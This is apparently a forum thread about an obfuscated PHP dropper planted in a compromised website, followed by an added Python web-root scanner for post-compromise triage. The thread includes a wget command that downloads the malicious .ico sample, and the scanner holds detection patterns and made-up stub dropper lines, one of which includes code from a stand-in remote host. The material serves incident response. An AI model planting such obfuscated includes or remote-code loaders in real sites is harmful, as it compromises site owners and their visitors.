So I found the below piece of code in my webhost account; it was smart enough to overwrite my default index.html and replace it with an index.php containing the below code, which got executed each time someone hit the website without showing any signs of a hack to the end user.
Turns out my FTP username was compromised, so that's how it found its way in; however, I'm trying to decode and make sense of what exactly it does.
No idea what the ade56 is all about?
Maybe it's supposed to be a clever algo cloaking the actual #include…
wget eddywebs.com/password-generator/css/.d40df8b5.ico > sample
gives us some weird-ass PHP code. Looks 'encrypted' with some number-to-character mapping…
Hi there! Thanks for a fun challenge! I'm sharing here the clear-text code in its final stage.
As a malware researcher, I encounter tons of examples like this. My main method is to clean the noise and let the malicious code decrypt itself. If there's a request, I'll write you a write-up of how I did it and why I did every step.
So what do we have here?
Seems like an implementation of a TDS client and an injection of JavaScript code into the browser. This is just an assumption from a quick read of the keywords.
I honestly didn’t read the code once I got to the final stage of a clear-text + commented code.
The rest is for you as an exercise.
You can try, for example, to decrypt the encoded config data.
Hi guys, just got this. @ricksanchez the file seems to have been introduced on Aug 14 on the webserver and is not in the original source code.
Here is what I found on the server using ls -la:
I will contact the sysadmins to find out any more info. About the actual contents of the .ico file, I guess the smart folks here have already figured that out.
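Building on the triage approach used in this thread (checking modification dates with ls -la, and noticing PHP code hiding in a .ico file), here is an added example of a simple web-root scanner a site owner can run after a compromise like this one. It is not code from the thread and does not decode the dropper; it flags files touched after a cutoff date, non-PHP files that contain a PHP open tag, and PHP source that uses common obfuscation primitives (eval, base64_decode, gzinflate, chr() number-to-character chains, remote includes). The sample files it scans are constructed inline for the demonstration; the .ico filename mirrors the one in the thread, but its contents and the other file contents are made up.

```python
"""Post-compromise triage scan of a web root (added example, not from the thread).

Flags files modified after a cutoff, PHP code hiding under non-PHP extensions
(e.g. a .ico file), and PHP source using common obfuscation/evaluation primitives.
A hit is a triage signal for manual review, not proof of malice.
"""
import os
import re
import tempfile
import time
from datetime import datetime, timezone

# Markers commonly seen in obfuscated PHP droppers.
SUSPICIOUS_PATTERNS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "gzinflate": re.compile(r"\bgz(inflate|uncompress|decode)\s*\("),
    "str_rot13": re.compile(r"\bstr_rot13\s*\("),
    # preg_replace with the /e modifier evaluates the replacement as PHP
    "preg_replace_e": re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]"),
    # four or more chr(N). pieces in a row: a number-to-character mapping
    "chr_chain": re.compile(r"(chr\s*\(\s*\d+\s*\)\s*\.\s*){4,}"),
    "remote_include": re.compile(r"\b(include|require)(_once)?\s*\(?\s*['\"]https?://"),
}
PHP_TAG = re.compile(r"<\?php|<\?=")
PHP_EXTENSIONS = {".php", ".phtml", ".php5", ".inc"}


def scan_file(path, root, cutoff_ts):
    """Return a findings dict for one file, or None when nothing stands out."""
    try:
        with open(path, "rb") as fh:
            data = fh.read(512 * 1024)  # droppers are small; cap the read
    except OSError:
        return None
    text = data.decode("latin-1")  # lossless byte-to-str for pattern matching
    ext = os.path.splitext(path)[1].lower()
    mtime = os.path.getmtime(path)
    findings = []
    if mtime >= cutoff_ts:
        findings.append("modified_after_cutoff")
    has_php = bool(PHP_TAG.search(text))
    if has_php and ext not in PHP_EXTENSIONS:
        findings.append("php_in_non_php_file")
    if has_php or ext in PHP_EXTENSIONS:
        for name, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(text):
                findings.append(name)
    if not findings:
        return None
    return {
        "relpath": os.path.relpath(path, root),
        "mtime": datetime.fromtimestamp(mtime, tz=timezone.utc).isoformat(),
        "findings": findings,
    }


def scan_webroot(root, cutoff_ts):
    """Walk the web root and collect every file with at least one finding."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            hit = scan_file(os.path.join(dirpath, name), root, cutoff_ts)
            if hit:
                results.append(hit)
    return sorted(results, key=lambda r: r["relpath"])


def build_sample_webroot():
    """Constructed sample web root (contents made up for this demonstration)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    old = time.time() - 30 * 86400  # "original" site files: a month old
    samples = {
        "index.html": ("<html><body>hello</body></html>\n", old),
        "app/config.php": ("<?php\n$db_host = 'localhost';\n", old),
        # PHP hidden in a .ico file, freshly written (the thread's filename, made-up body)
        "css/.d40df8b5.ico": ("<?php eval(gzinflate(base64_decode('H4sIAAAA...')));\n", None),
        # replaced index.php using a chr() chain to hide its strings
        "index.php": ("<?php $f=chr(104).chr(116).chr(116).chr(112).chr(115);"
                      " include($f.'://example.invalid/x');\n", None),
    }
    for rel, (body, mtime) in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
        if mtime is not None:
            os.utime(path, (mtime, mtime))
    return root


def demo():
    """Scan the constructed web root; anything touched in the last day is interesting."""
    root = build_sample_webroot()
    return scan_webroot(root, time.time() - 86400)


if __name__ == "__main__":
    for hit in demo():
        print(hit["mtime"], hit["relpath"], ", ".join(hit["findings"]))
```

Run against a real web root with `scan_webroot("/var/www/html", cutoff)` where the cutoff is the last known-good deployment time; compare the flagged list against your version-controlled source, the same check the thread performs by hand. Rotate the compromised FTP credential (and move to SFTP with key authentication if the host supports it) before restoring clean files, or the dropper will simply come back.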